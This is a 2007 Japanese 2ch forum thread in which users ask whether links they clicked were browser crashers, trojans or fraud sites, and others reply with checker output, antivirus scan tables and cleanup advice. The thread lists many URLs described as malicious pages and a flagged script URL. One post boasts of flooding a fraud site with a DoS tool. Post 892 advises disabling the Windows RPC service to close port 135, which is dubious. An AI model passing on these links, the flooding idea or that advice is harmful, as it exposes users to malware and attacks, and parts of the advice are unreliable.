835名無しさん@お腹いっぱい。:2007/09/26(水) 17:00:39
ttp://www17.plala.or.jp/suigin/red4.htm
これってただのグロだよね?ブラクラとかウイルスとかじゃないよね?
836名無しさん@お腹いっぱい。:2007/09/27(木) 03:24:21
>>835
red4.swfにリンクされていて 「 このファイルは危険なファイルのひとつです。 」 とでた。
837名無しさん@お腹いっぱい。:2007/09/27(木) 19:33:29
確かにオンラインチェッカーではそう出るけど、ウイルスバスターのリアルタイムスキャンは何も反応しなかったんだよね
念のためにバスターのフルスキャンと、カスペルスキーのオンラインスキャンをかけたけど何も出なかった
インターネットキャッシュも削除したし、一応何でもないことにしておくよ
838名無しさん@お腹いっぱい。:2007/09/29(土) 13:49:46
ttp://amazon.zz.tc/B0B8054
踏んでしまいました
どうすればいいのかおしえてください・・・
839名無しさん@お腹いっぱい。:2007/09/29(土) 20:29:03
ブラウザの一時キャッシュを削除してお終い。
840名無しさん@お腹いっぱい。:2007/09/30(日) 03:24:15
>>839
これはトロイといわれるものなんですか?
841名無しさん@お腹いっぱい。:2007/10/01(月) 01:30:46
ただのブラクラ
842名無しさん@お腹いっぱい。:2007/10/01(月) 01:31:29
ttp://www.crazyclits.com/?cgi-bin/tm3/1d4f97.jpg

これ踏んじゃって、AVGがブロックしてくれたみたいなんだけど
焦ってウインドウ閉じちゃったら、その後AVGスキャンしたら3個ヒットしました。
2つは隔離してくれたみたいなんだけど、1つどうしても消えないんで、
システムの復元してもう一回スキャンしたけど、unknown virus exploit wmfってのがヒットしました。
AVGうpデートしてもう一回更に一日前にシステム復元したら今度はヒットしませんでした。
これで大丈夫なんでしょうか??
843名無しさん@お腹いっぱい。:2007/10/01(月) 02:10:35
>>841
ありがとうございます。
844名無しさん@お腹いっぱい。:2007/10/01(月) 16:58:23
【使用OS】
Me
【WindowsUpdateしてるか】
HP見てみたらMeは使えないとかなんとか…
【AntiVirusは何を使っているか】

【ちゃんとUpdateしてるか】
たぶんしてません
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
今のところ何とも無く普通に使えてます
【何をしたらそんなことになったのか】
tp://ime.nu/imepita.zz.tc/020070817
これ踏んでしまいました…
なんかどっかのスレでこのURLはトロイの木馬だと
見た記憶があるのでかなり焦ってます
【その他の質問】
パソコンはド初心者なので何すれば良いのかまったくわかりません…
何か処置方法教えて下さい
845名無しさん@お腹いっぱい。:2007/10/01(月) 20:49:00
>>844
有名なブラクラに飛ばされます。IEで踏んだのなら
画面上部のツール>インターネットオプション>
Cookieの削除>ファイルの削除>OKボタンクリック
してキャッシュを削除します。
そしてウイルスソフトを入れてないなら、各社オンラインスキャン
してみましょう。と言いたいところですがOSがMeだと
利用できない所が多いようです。体験版も使えないし。
Meに対応したウイルスソフトがもう少ないので、
Me対応のウイルスソフトを買ってトロイを削除した方が
いいと思います。
846844:2007/10/01(月) 22:52:06
>>845
専ブラ(ギコナビ)で2ちゃんを見ている時に踏みました
いま一応やっといたほうがいいかなと思ってファイルの削除→OKを押して、
ちゃんと消えたのかなと思ってファイルの表示っていうのを押してみたら
なんかエラー(『表示出来る記憶域がありません』?)というのが延々と出てきて
焦りました… これちゃんと消せてるんでしょうか?

Meだとほとんど利用できないんですね…購入も考えてみます
ちなみに、>>845を踏むとどういう害が出るんですか?
今のところ普通に使えますが、知らないうちに何か起こってるんでしょうか…
847名無しさん@お腹いっぱい。:2007/10/02(火) 00:34:53
>>846
Me対応のウイルスソフトあります。フリー(無料)で使えます
以下からダウンロードしてインストールし、最新の定義パターン
に更新してから、ウイルススキャンしてみて下さい

http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html
848名無しさん@お腹いっぱい。:2007/10/03(水) 03:57:34
ttp://pya.cc/pyaimg/pimg.php?imgid=18850

おまけ
米国皇帝
【別ベージのフラッシュをご覧ください】


↑踏んだら黒とピンクの画面になったんですが・・・
とりあえずインターネットオプションで消せるものは消しました。
849名無しさん@お腹いっぱい。:2007/10/03(水) 13:26:18
>>847
844です
わざわざ教えてくださってありがとうございます
さっそく使ってみたらトロイの木馬2つとウィルス4つ見つかりました…;
これで安心出来ました、レス本当にありがとうございました
850名無しさん@お腹いっぱい。:2007/10/03(水) 19:33:03
質問です

さっきブラクラを踏んでしまい
再起動したらマウスが出なくなってしまったのですがどうすれば直りますか?

OSはMeでIEを使っています
851名無しさん@お腹いっぱい。:2007/10/03(水) 19:59:41
【使用OS】
WindowsME
【WindowsUpdateしてるか】 してません
【AntiVirusは何を使っているか】

【ちゃんとUpdateしてるか】 してません
【スキャンした結果(ウイルス名・発見場所)】
スキャンしてないです
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
踏んで、慌てて再起動したらマウスポインタが表示されなくなりました…
【何をしたらそんなことになったのか】
ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi
ttp://cgi.cyborg.ne.jp/~paradise/cgi-bin/
この二つのどちらかを踏んでしまいました
【これまでにとった措置】
すいません
なにもしてないです
今は携帯から書き込んでます
852名無しさん@お腹いっぱい。:2007/10/03(水) 20:37:53
>>851
とりあえずWINDOWSキーと十字キー使ってシステムの復元できないか?
できるかやってみそ
853名無しさん@お腹いっぱい。:2007/10/03(水) 20:44:40
>>852復元に失敗しました
って表示されます…
854名無しさん@お腹いっぱい。:2007/10/03(水) 21:34:25
>>853
セーフモードで起動させてもシステムの復元できないか?
Meだと電源投入時からCtrlキーを押しっぱなしでメニュー
からSafe Modeで起動
855名無しさん@お腹いっぱい。:2007/10/03(水) 22:51:24
tp://sorimati.s3.x-beat.com/upload/source/up0140.jpg
慌てて強制終了しましたが、踏んでしまいました。
WindowsUpdateはしていませんでした。
オンラインスキャンではトロイが発見されました。
Ad-Aware2007でスキャン、削除したけど大丈夫でしょうか?
対処法お願いします。
856名無しさん@お腹いっぱい。:2007/10/03(水) 23:19:59
>>855
OS再インストールからはじめよう
857名無しさん@お腹いっぱい。:2007/10/04(木) 07:47:37
ありがとうございます。再インストールしてみます。
858名無しさん@お腹いっぱい。:2007/10/07(日) 17:50:57
よそでも質問して再インストールと言われたのですけど

tp://mantoruhakase-blog.bravehost.com/

これなんですけどどうでしょうか・・・
よろしくお願いします|||orz
859名無しさん@お腹いっぱい。:2007/10/07(日) 19:39:35
>>858
ブラクラだろう
ページのHTMLソースの中にwww.albinoblacksheep.com/script/you.jsとか入ってるし
albinoblacksheep.comって有名だし
やばいと思うよ
ちなみに、上記ファイルを開こうとしたら、俺のavast!が「VBS:Malware [Gen]」を検出したと騒いだ
860858:2007/10/07(日) 21:10:59
再インストしか対処方法ないですかね・・・
AVGとカスペルでスキャンしたところ何も発見されなかったのですけど
861ポンプ大帝 ◆Cyv0oh.DWo :2007/10/07(日) 21:36:37
よくネカフェで踏んでしまいます><
862名無しさん@お腹いっぱい。:2007/10/07(日) 23:45:42
カスペでスキャンしたら、ウイルスが発見されたんですけど、
どうやって駆除すればいいんでしょうか?
863名無しさん@お腹いっぱい。:2007/10/08(月) 10:10:09
>>860
ブラウザの一時キャッシュを削除すればいい。
他は特にないし。
864カレン:2007/10/08(月) 18:26:43
↓の踏んでしまいました・・・リアルプレイヤー、メディアプレイヤーが勝手にきどうしたんですけど
どうすればいいでしょうか?助けてくださいお願いします。
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=http%3A%2F%2F%77%77%77%2E%68%65%6C%6C%70%6C%61%6E%74%2E%6F%72%67%2Fcgi-bin%2F%78%6F%6F%72%2F%73%65%72%70%65%6E%74%2E%63%67%69&btnI=I%27mFeelingLucky&num=50
865名無しさん@お腹いっぱい。:2007/10/08(月) 19:50:42
hellplantにつながってる
IP抜きとか厨房ほいほいと呼ばれてるそこそこ有名な物
ウイルシとかは無い
866名無しさん@お腹いっぱい。:2007/10/08(月) 20:44:02
ttp://blackhole23.web.fc2.com/i/blackhole.html
ここの正式メンバー紹介のリンクを踏んでしまったんですが大丈夫でしょうか?
867カレン:2007/10/08(月) 21:12:53
ウイルス無いですか・・・良かった・・・
ありがとうございます。
ほかに害は無いのでしょうか?
クッキー+ファイル削除+再起動でいいですか?
868名無しさん@お腹いっぱい。:2007/10/08(月) 22:42:25
うん
869名無しさん@お腹いっぱい。:2007/10/12(金) 20:29:05
久し振りにゾンビウインドウを踏んだOTL
870名無しさん@お腹いっぱい。:2007/10/14(日) 03:46:15
tp://mantoruhakase-blog.bravehost.com/
を踏んだらトロイの木馬が検出されたと出てしまいました。
どうすればいいですか?
871名無しさん@お腹いっぱい。:2007/10/14(日) 07:50:25
ブラウザの一時キャッシュを削除
872870:2007/10/14(日) 11:33:50
一時キャッシュとはどうやるのでしょうか
教えてちゃんですみません
873名無しさん@お腹いっぱい。:2007/10/14(日) 11:48:18
Microsoft Internet Explorer (IE)

1. 新しいブラウザを開き、ブラウザの上部にある [ツール] メニューの [インターネット オプション] をクリックします。
2. ダイアログ ボックスの上部にある [全般] タブをクリックします。
3. [インターネット一時ファイル] の下にある [ファイルの削除] をクリックします。
4. [すべてのオフライン コンテンツを削除する] のチェック ボックスをオンにします。
5. [OK] をクリックします。

Mozilla Firefox

1. 新しいブラウザを開き、ブラウザの上部にある [ツール] メニューの [オプション] をクリックします。
2. [プライバシー] をクリックします。
3. [キャッシュ] の横の [クリア] をクリックします。
4. [OK] をクリックします。
874870:2007/10/14(日) 17:40:29
やってみます!
ありがとうございました!
875870:2007/10/14(日) 21:31:18
色々試してみて、システムの復元も行い、ウイルススキャンからも感染ファイルは見つからなかったのですが、
突然ファーアオォールが有効から無効になりました。
すぐに有効に直しましたが、これはトロイが潜んでいるということなのでしょうか?
876870:2007/10/14(日) 22:45:54
連投すみません。

×ファーアオォール
○ファイアウォールです
すみません
ふじこりました

誰か助言お願いします。

ブラウザの一時キャッシュの削除も行いました
877名無しさん@お腹いっぱい。:2007/10/22(月) 15:42:20
>>866
-- 「2007/10/07 6:49」のキャッシュをチェックしています。 --
注意!ループタグを発見! (2)
878名無しさん@お腹いっぱい。:2007/10/22(月) 17:00:53
>>877
>-- 「2007/10/07 6:49」のキャッシュをチェックしています。 --
古すぎ。今は、404
879名無しさん@お腹いっぱい。:2007/11/06(火) 00:29:42
age
880名無しさん@お腹いっぱい。:2007/11/06(火) 00:32:40
よくもまあ、これだけポンポンクリックする奴が居たもんだな
ネット詐欺で儲ける奴が出るわけだ
881名無しさん@お腹いっぱい。:2007/11/08(木) 02:18:52
とある衝撃?画像スレで貼られており、勢いにのって大した確認もせずに踏んでしまいました。
そのスレでは後々トロイの木馬だと書き込まれています。

tp://sorimati.s3.x-beat.com/upload/source/up0140.jpg

小さいウィンドウが大量に出現し、慌ててPCをシャットダウンしましたが、
これは情報流出系のブラクラなのでしょうか?
PC知識乏しくて申し訳ありませんが、お教え下さい。お願い致します。
882名無しさん@お腹いっぱい。:2007/11/08(木) 16:08:12
>>881
-- 「2007/11/08 4:14」のキャッシュをチェックしています。 --
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (1)
注意!ループタグを発見! (3)
注意!逃げウィンドウを発見! (2)
危険!mailtoストームを発見! (100)
危険!FDDアタックを発見!(24)
危険!無限ループを発見! (2)
危険!ニュースストームを発見! (6)
危険!Telnetストームを発見! (155)
ブラクラチェックが終了しました。

※ ジャンプタグを発見しました。(1)
※ このページは自動的にリロードされるようです。
※ windowオープンを発見しました。(3)
./
※ インラインフレームタグを発見しました。 (99)
ttp://www.flavinha.com/
ttp://www.bailefunk.com/
ttp://www.surubanet.com/
ttp://oss.jodi.org/
ttp://216.255.183.62/

いつもの奴でしょうね
キャッシュをクリアして、セーフモードでスキャンして何も検出されなきゃおk
883名無しさん@お腹いっぱい。:2007/11/08(木) 16:14:26
mailtoストームたくさん、telnetストームもたくさん
iflameで大量の有害サイトを読み込んでるみたいです
鑑定スレの過去ログではトロイとかも検出されてるようです
そのトロイがどんな被害を出すかまではわからないけど一度オンラインスキャンした方が良いと思われ
884881:2007/11/09(金) 18:46:04
>>882-883
ご返答ありがとうございました。
御忠告に従い、下記URLでスキャンをしてみました。
tp://www.trendflexsecurity.jp/security_solutions/housecall_free_scan.php#

結果、複数のスパイウェアが発見され、駆除いたしました。
アドウェアというもののみ駆除出来ませんでしたが、調べてみてそれほど害は無いと判断しています。
本当にありがとうございました。以後気をつけます。
885名無しさん@お腹いっぱい。:2007/11/10(土) 23:24:21
>>876
笑える
886名無しさん@お腹いっぱい。:2007/11/10(土) 23:52:52
ウィルスっぽいですが鑑定してください><
ttp://www8.uploader.jp/dl/vipprog/vipprog_uljp00181.zip.html
【使用OS】
windows vista
【WindowsUpdateしてるか】
yes
【AntiVirusは何を使っているか】
no
【ちゃんとUpdateしてるか】
no
【スキャンした結果(ウイルス名・発見場所)】
いまやってる最中です><
【別のオンラインスキャンしたならその結果は】
ないです><
【症状を具体的に、分かる限りすべて書く】
もしウィルスだったらどうするの
という窓が出て画面がジョジョに黒くなり白くなり真っ白になる
ボロークンファイルなんちゃらエラーなんちゃらという英語がでてきた
再起動してなおったっぽいのでごみ箱に捨ててオンラインスキャン最中です
【何をしたらそんなことになったのか】
DL→回答→起動→\(^o^)/
【これまでにとった措置】
オンラインスキャン最中
【その他の質問】
これからどうすればいいか
ウィルスなのか、またどういうウィルスなのか
この二つを馬鹿な私に御教授してください
887名無しさん@お腹いっぱい。:2007/11/11(日) 00:13:01
>>886
ファイルスキャンの結果は既存のウィルスではないようです。
しかし一部のソフトはウィルスの疑いのあるファイルと判定しています。
たぶんジョークで作ったのかもしれませんがウィルスとして活動している可能性もあります。

アンチウィルスは無料のもあるので入れといたほうがいいですよ。

フリーのアンチウイルスソフト Part13
http://pc11.2ch.net/test/read.cgi/sec/1190127939/
888名無しさん@お腹いっぱい。:2007/11/11(日) 00:13:37
AhnLab-V3 2007.11.10.0 2007.11.09 -
AntiVir 7.6.0.34 2007.11.09 -
Authentium 4.93.8 2007.11.10 -
Avast 4.7.1074.0 2007.11.09 -
AVG 7.5.0.503 2007.11.10 -
BitDefender 7.2 2007.11.10 -
CAT-QuickHeal 9.00 2007.11.10 -
ClamAV 0.91.2 2007.11.10 -
DrWeb 4.44.0.09170 2007.11.10 -
eSafe 7.0.15.0 2007.11.08 -
eTrust-Vet 31.2.5284 2007.11.09 -
Ewido 4.0 2007.11.10 -
FileAdvisor 1 2007.11.10 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.09 -
F-Secure 6.70.13030.0 2007.11.09 -
Ikarus T3.1.1.12 2007.11.10 -
Kaspersky 7.0.0.125 2007.11.10 -
McAfee 5160 2007.11.09 -
Microsoft 1.3007 2007.11.10 -
NOD32v2 2651 2007.11.10 -
Norman 5.80.02 2007.11.09 -
Panda 9.0.0.4 2007.11.10 Suspicious file
Prevx1 V2 2007.11.10 -
Rising 20.17.52.00 2007.11.10 -
Sophos 4.23.0 2007.11.10 -
Sunbelt 2.2.907.0 2007.11.09 -
Symantec 10 2007.11.10 -
TheHacker 6.2.9.122 2007.11.09 -
VBA32 3.12.2.4 2007.11.08 -
VirusBuster 4.3.26:9 2007.11.10 -
Webwasher-Gateway 6.0.1 2007.11.10 -
889名無しさん@お腹いっぱい。:2007/11/11(日) 00:14:29
これ以上はわかりません。 誰かお願いします。
890名無しさん@お腹いっぱい。:2007/11/11(日) 01:28:31
>>887
>>888
>>889
ありがとうございます
オンラインスキャンをした結果セキュリティホール3つが検出されただけでした

念のためアンチウィルスソフトいれてみます
素早い回答ありがとうございます><
891名無しさん@お腹いっぱい。:2007/11/11(日) 02:17:45
転職板にこんなのがありました。
拡張子が怪しそうなのですが、鑑定願います。

tp://ad.affipa.ne.jp/LK00002639/PS00037055/click.cgi

892名無しさん@お腹いっぱい。:2007/11/11(日) 09:52:11
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
893名無しさん@お腹いっぱい。:2007/11/11(日) 12:40:53
>>891
ここは鑑定スレじゃねえ!!
どっか行け糞が

ちなみにそれはなんでもない転職なんちゃらいうサイトだ
894名無しさん@お腹いっぱい。:2007/11/12(月) 14:11:06
ブラクラ焦るよな

経験あり
895名無しさん@お腹いっぱい。:2007/11/12(月) 14:57:23
>>892
これってほんと?
この番号のポートをルーターで閉じるだけじゃ駄目なの?
896名無しさん@お腹いっぱい。:2007/11/12(月) 19:31:19
ルーターで遮断しているならまず問題ないような気はするが、リモートからの攻撃が届かない
というだけだからな
もしMS03-026のような脆弱性がRPCに発見された場合、ローカルで脆弱性を利用するプログラムを
実行されたら対処する術が無いのもまた事実だ
そういう意味では必要無いサービスは停止というのは有効だと思う
897名無しさん@お腹いっぱい。:2007/11/13(火) 22:00:20
>>896
遅レスすみません。ありがとうございました。
確認したら、すでにルーターで塞いでましたが、とりあえずやっときます。
898名無しさん@お腹いっぱい。:2007/11/20(火) 20:34:20


operaで、
JAVAとプラグインとJAVAスクリプトとクッキーとリファラーを無効にしてても
発動するようなブラクラ紹介しろよカス。

こちとらブラクラ踏んでも毎回何も起こらないんで退屈なんだよ!


 .
899名無しさん@お腹いっぱい。:2007/11/20(火) 20:39:37
そういうスレではないので
900名無しさん@お腹いっぱい。:2007/11/20(火) 22:36:37
901名無しさん@お腹いっぱい。:2007/11/21(水) 07:14:19
>>898
鑑定スレいってかたっぱしから踏め
902名無しさん@お腹いっぱい。:2007/11/21(水) 21:31:39
>>898
かたっぱしから踏んできたがたいしたことなかったぞ。マジで。






.
903名無しさん@お腹いっぱい。:2007/11/21(水) 21:32:15
まちがえた
>>901
904名無しさん@お腹いっぱい。:2007/11/22(木) 17:17:45
俺はリファラーだけ有効だな
頻度が多すぎるし、JAVAスクリプトみたいに入り切りのボタン無いし

リファラーとブラクラって関係あるの?
905898:2007/11/22(木) 19:47:03
>JAVAスクリプトみたいに入り切りのボタン無いし
operawiki
http://www.opera-wiki.com/index.php?FAQ%2F5.%E3%82%AB%E3%82%B9%E3%82%BF%E3%83%9E%E3%82%A4%E3%82%BA#rc177965
の、「あーもうめんどくさい!という人は」の項目のリンク内のどれかで、
リファラーのボタンも見付けたけど?

リファラーとブラクラは関係ないだろうけど、俺は基本OFFにしてる。

リファラー 危険性 とかでググってみるといいかも。
906名無しさん@お腹いっぱい。:2007/11/22(木) 22:01:08
あ、ほんとだ、普通にボタンあった
907名無しさん@お腹いっぱい。:2007/11/25(日) 10:44:31
ttp://www.moviesglam.com/
を踏んでしまって、バスターが警告出してきました。
数日前の状態へ復元して、Temporary Internet Filesの中も全て削除しました。

あとはスキャンしてみて、何も出てこなければ大丈夫でしょうか?
908名無しさん@お腹いっぱい。:2007/11/25(日) 12:41:45
↓ Avira でワームとトロイが検出されたんだが誤検出かな?
ttp://jinken-vip.tripod.com/flash.html
909名無しさん@お腹いっぱい。:2007/11/25(日) 15:00:59
↓これなに?
http://melkko.net?hitoduma
910名無しさん@お腹いっぱい。:2007/11/25(日) 15:18:19
ここは鑑定スレじゃねえ糞野郎
911名無しさん@お腹いっぱい。:2007/11/25(日) 17:28:33
>>909
※このアドレスはワンクリック詐欺サイトのひとつです。
912名無しさん@お腹いっぱい。:2007/11/26(月) 00:24:32
http://nun.nu/www.freepe.com/i.cgi?johnnyslovin

これは大丈夫でしょうか?
913名無しさん@お腹いっぱい。:2007/11/26(月) 00:35:56
>>911
俺、低脳糞業者のワンクリ大好きw
田代砲で10000回くらい踏んでくるわwww
914名無しさん@お腹いっぱい。:2007/11/26(月) 02:23:07
915名無しさん@お腹いっぱい。:2007/11/26(月) 12:23:42
>>911
どこをワンクリックするんだ?w
916名無しさん@お腹いっぱい。:2007/11/28(水) 01:56:29
945 :Trader@Live!:2007/11/28(水) 00:01:27.65 ID:/UudUe7E
ミミゲール博士のブログ見てから文句言えアホ
http://1st.geocities.jp/mimigeruhakaseblog/

ブラクラですかね
おねがいします
917名無しさん@お腹いっぱい。:2007/11/28(水) 11:57:29
鑑定依頼ばっかw
918名無しさん@お腹いっぱい。:2007/11/28(水) 23:20:17
ちょっと前までけっこう勢いのあるスレだったのにね
貼られたURLかたっぱしからNGにしてただけだけど
919sage:2007/11/29(木) 23:31:32
もし怪しいときに
「ブラウザの一時キャッシュ」
をしなかったらどういった被害があるのでしょうか?
920名無しさん@お腹いっぱい。:2007/11/30(金) 01:46:26
ソースチェッカーオンラインで自分たちで少しは調べたらどうだ
921名無しさん@お腹いっぱい。:2007/11/30(金) 15:05:26
そんな習慣が無い人が聞いてくるのさ
詐欺にもポンポン引っかかるだろうな
922名無しさん@お腹いっぱい。:2007/12/01(土) 21:57:43
上のほうにもあったのですがttp://imepita.zz.tc/020070817 を踏んでしまいました。
踏んだらピコピコ音がずっとしててページは開かず
右下の緑が1コマのままだったので画面を×で閉じて終了しました。
この時点でもうこのサイトを踏んだことになってしまうのでしょうか(ページが開ききっていない)
有名なウイルスサイトだとわかって調べてみたのですが、
これは新しいウィンドウを開いたり、メールの新規作成を開いたりするだけなのでしょうか?
今はそのようなことはおきてません。
他には何か症状はありますか?自分のデータが外に出るウイルスがあるようですが
そのようなことはないのでしょうか?

ウィルス対策ソフトをまだいれてなかったので、駆除などができていません。
マイコンピューターでHTML_SUAR.Aを検索して削除すればよろしいのでしょうか?
923名無しさん@お腹いっぱい。:2007/12/02(日) 00:50:54
>>922
ウイルスじゃない、気にするな
IEの一時ファイルの削除でOK
924名無しさん@お腹いっぱい。:2007/12/02(日) 02:01:18
>>922
危険URLだね。オンラインスキャンしたほうがいいと思う。
詳しくはソースチェッカーオンラインで検索してURL調べてくれ
925名無しさん@お腹いっぱい。:2007/12/02(日) 02:51:59
>>923-924
どっちなんでしょうか?
>>924さん危険とは具体的にどうなんでしょうか
とりあえずノートンでも明日買ってこようかなと思ってますが
926424:2007/12/02(日) 07:03:51
>>425
悪い寝ぼけてたわ。そこのサイト自体は問題ないと思う。
ただ、そこから危険なサイトに行けるだけだわ
927名無しさん@お腹いっぱい。:2007/12/02(日) 07:06:38
925だった。気になるならヤフーでソースチェッカーオンラインで検索して調べてみればいいよ
928名無しさん@お腹いっぱい。:2007/12/02(日) 12:06:24
質問です。もともとPCにノートンがはいっているのですが、スキャンをしてスパイスウェアなどは検出されませんでした。
とでればウイルスの心配はありませんか??
929名無しさん@お腹いっぱい。:2007/12/02(日) 13:36:12
まだ不安にならカスペルスキーオンラインスキャナとウィルスバスターのオンラインスキャンもしてみたらどう?
930名無しさん@お腹いっぱい。:2007/12/02(日) 15:04:58
昨日yourhost?というアダルト動画の投稿サイトで、オナニー
しようとしてurl踏んだら、別のウィンドウが、
でてきて、HadodoraiBugadoていうのを保存
したら、103に対する重大なエラーが生じた。
とか表示されました。NTT西日本のウイルス検索
ツールで、ウイルス検索したら検索してる間は1
9万近く検索済みって表示されたのに、検索が
全て終ったら、ウイルスは見つかりませんでし
た。って表示されました。これはどうしたらいいんですか?なんか携帯
でぐぐったらHadodoraiBugadoは最悪とかあったんで心配です
931名無しさん@お腹いっぱい。:2007/12/02(日) 15:14:34
tp://www2.strangeworld.org/uedakana/

踏んで、焦りました。これってやばいでしょうか?
アドバイス、お願いいたします。
932名無しさん@お腹いっぱい。:2007/12/02(日) 17:35:53
>>930
アンチウイルスが何も見つからなかった、と言ってる以上
それで納得するしか無いんじゃなかろうか
それでも不安ならまた別のウイルススキャン試していくしかない
無償オンラインスキャン|ウィルスチェック Part.2
http://pc11.2ch.net/test/read.cgi/sec/1177784260/

Yourfilehostはたまに広告経由で悪意のあるページを呼び出す事があるから
PCに対策を施してないなら近づかない事を勧める

>>931
有名なブラクラ
一部アンチウイルスが反応するが特に感染活動は行わない
脱出できたなら問題無い
このスレでも散々既出なんで検索おね
933930:2007/12/02(日) 17:50:21
有難うございます。でもなぜ検索中は19万も
ヒットしたのに、終わると0になったのは心配
なのでオンラインの検索しようと思うのですが
、ウイルスにかかってる状態でもネットに繋げても大丈夫でしょうか?
こちらの情報が流出したり、他のネットユーザーに
ウイルスを広げたりしても困るので‥
934名無しさん@お腹いっぱい。:2007/12/02(日) 18:40:04
検索済みというのは、そのファイルを検査しましたって事で
ウイルスに感染している事を示すものでは無い

結果表示の時点で感染無しと診断されたのなら
当面それを信じる他無い
935名無しさん@お腹いっぱい。:2007/12/02(日) 18:47:38
わかりました。有難うごございます
936名無しさん@お腹いっぱい。:2007/12/07(金) 20:33:51
mantoruhakaseを踏んでしまいましたorz
ウイルスバスターでyou[1].js検出して
削除したんですがもう大丈夫なんでしょうか?
それとも・・・
937名無しさん@お腹いっぱい。:2007/12/07(金) 21:05:01
ageわすれ
938名無しさん@お腹いっぱい。:2007/12/07(金) 21:18:25
tp://mantoruhakase-blog.bravehost.com/

マントル…頼む!
939名無しさん@お腹いっぱい。:2007/12/07(金) 21:30:58
過去スレで解決しました
お騒がせスイマセン
940名無しさん@お腹いっぱい。:2007/12/07(金) 23:27:50
http://www.vipper.org/vip685992.jpg

踏んだ時は何もなかったのですが…
ブラクラと教えられました。ブラクラなのでしょうか…?
941名無しさん@お腹いっぱい。:2007/12/07(金) 23:28:36
>>940
すみません、誤って直リンしてしまいました…;
942名無しさん@お腹いっぱい。:2007/12/07(金) 23:33:27
まあ、精神的ブラクラかも知れないなw
PCには何の損害も無い
何故ならただの画像ファイルだからだ
943名無しさん@お腹いっぱい。:2007/12/07(金) 23:35:08
>>942
ありがとう御座いました。
画像ファイルはウィルスでは無いのですか?
とりあえず一安心です。本当にありがとう御座います。
944名無しさん@お腹いっぱい。:2007/12/07(金) 23:39:56
こ、これはひどい
945名無しさん@お腹いっぱい。:2007/12/07(金) 23:41:27
>>944
え?え?何がですか?
946942:2007/12/07(金) 23:49:19
>>943
太めのおばさんの裸の写真が出てきただろ?
それだけだよ
精神的にショッキングな画像かもしれないということで「精神的ブラクラ」とw
947名無しさん@お腹いっぱい。:2007/12/07(金) 23:51:11
>>946
ああなんだ、良かった…
ありがとう御座います。ホッとしましたw
948名無しさん@お腹いっぱい。:2007/12/07(金) 23:59:17
マントルふんじゃってAVGでトロイ見つけて
削除したけどそれだけで大丈夫かな?
えらい人教えてください。
949名無しさん@お腹いっぱい。:2007/12/08(土) 00:02:41
>>948
削除したならひとまずは大丈夫だと思いますが、念を押すとOSのインストール
をし直した方が良いかも知れません。
トロイは再生するものもあると聞きましたので…
950名無しさん@お腹いっぱい。:2007/12/08(土) 00:07:47
>>948
VIPで流行ってるやつだよな?あれなんなの?
951名無しさん@お腹いっぱい。:2007/12/08(土) 00:15:54
>>949
ありがとうございました!
>>950
自分もよくわからないです。エロに釣られました!
952名無しさん@お腹いっぱい。:2007/12/08(土) 01:14:51
>>938
ttp://www.albinoblacksheep.com/script/you.js

ソースにこんなの入ってた
albinoblacksheepなんて名前見りゃ明らかにブラクラだけど、一応チェックw
you.jsだけのダウンロードを試みると即座に俺のavast!タソが派手な警告音とともに
「VBS:Malware-gen」と警告w
953名無しさん@お腹いっぱい。:2007/12/08(土) 01:17:49
あ、>>858にもあるなw
わりと前からある代物らしい
blogっぽいURLだからついクリックしても安全だと思い込むのが味噌か
下手に知識があると逆に引っかかる感じ
954名無しさん@お腹いっぱい。:2007/12/09(日) 10:28:56
ttp://up.mugitya.com/img/Lv.1_up42715.jpg

jpgファイルだと思って踏んでしまいました。
これは危ないと思い、パソコンを強制終了したのですが…。
まだ不安で仕方ありません。詳しい方、お願いします。
955名無しさん@お腹いっぱい。:2007/12/09(日) 18:57:20
>>954
とりあえず画像ではない。htmlファイル

中身はだいぶ手が込んでる
flvビデオを再生しようとすると各種ブラクラ+グロ画像ページへ飛ばされる

ざっと見ではウイルス感染活動は無いと思うけど
脱出できたのなら、一応念のためウイルススキャンした方がいいかもしれん

精神的ブラクラである事を前置きして、一応こっちでも聞いた方がいいかも
【ウィルス情報質問 総合スレッド★Part44】
http://pc11.2ch.net/test/read.cgi/sec/1192120765/


本当にamilalaが作ったものなら心配なので、帰ったらもう少し調べてみる
956954:2007/12/09(日) 20:14:45
>>955
鑑定ありがとうございます。
ノートンでスキャンしてみましたが、今のところ問題はなさそうです。
誘導してくださったスレでも聞いてみます。
もしまた何か分かりましたらレスくださると助かります。
957954:2007/12/09(日) 21:44:03
連レスすみません。
【ウィルス情報質問 総合スレッド★Part44】で、

ttp://so.7walker.net/index.php?site=http://up.mugitya.com/img/Lv.1_up42715.jpg
[このアドレスの安全度 99%]

との鑑定を受けました。
958名無しさん@お腹いっぱい。:2007/12/09(日) 22:51:53
ttp://www.guild-air.net/seal/up/img/009.-jpg


outlook勝手に起動して
